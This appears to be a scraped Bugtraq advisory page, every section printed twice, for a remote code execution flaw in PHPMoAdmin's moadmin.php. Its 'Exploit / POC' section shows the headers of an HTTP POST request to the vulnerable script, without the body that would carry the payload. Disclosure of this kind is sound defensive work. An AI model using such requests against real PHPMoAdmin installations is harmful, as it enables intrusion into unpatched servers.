PHPMoAdmin 'moadmin.php' Remote Code Execution Vulnerability
BID:72877
Info
PHPMoAdmin 'moadmin.php' Remote Code Execution Vulnerability
| Bugtraq ID: | 72877 |
| Class: | Design Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Mar 04 2015 12:00AM |
| Updated: | Mar 04 2015 12:00AM |
| Credit: | Pichaya Morimoto |
| Vulnerable: | |
| Not Vulnerable: | |
Discussion
PHPMoAdmin 'moadmin.php' Remote Code Execution Vulnerability
PHPMoAdmin is prone to a remote code-execution vulnerability.
Attackers can exploit this issue to execute arbitrary code in the context of the user running the affected applications. Failed exploit attempts will likely cause a denial-of-service condition.
PHPMoAdmin is prone to a remote code-execution vulnerability.
Attackers can exploit this issue to execute arbitrary code in the context of the user running the affected applications. Failed exploit attempts will likely cause a denial-of-service condition.
Exploit / POC
PHPMoAdmin 'moadmin.php' Remote Code Execution Vulnerability
Attackers can use standard commands to exploit this issue.
The following exploit and example request are available:
POST /moadmin/moadmin.php HTTP/1.1
Host: 192.168.33.10
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:36.0)
Gecko/20100101 Firefox/36.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Content-Length: 34
Attackers can use standard commands to exploit this issue.
The following exploit and example request are available:
POST /moadmin/moadmin.php HTTP/1.1
Host: 192.168.33.10
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:36.0)
Gecko/20100101 Firefox/36.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Content-Length: 34
Solution / Fix
PHPMoAdmin 'moadmin.php' Remote Code Execution Vulnerability
Solution:
Currently, we are not aware of any vendor-supplied patches. If you feel we are in error or are aware of more recent information, please mail us at: [email protected].
Solution:
Currently, we are not aware of any vendor-supplied patches. If you feel we are in error or are aware of more recent information, please mail us at: [email protected].
References
PHPMoAdmin 'moadmin.php' Remote Code Execution Vulnerability
References:
References: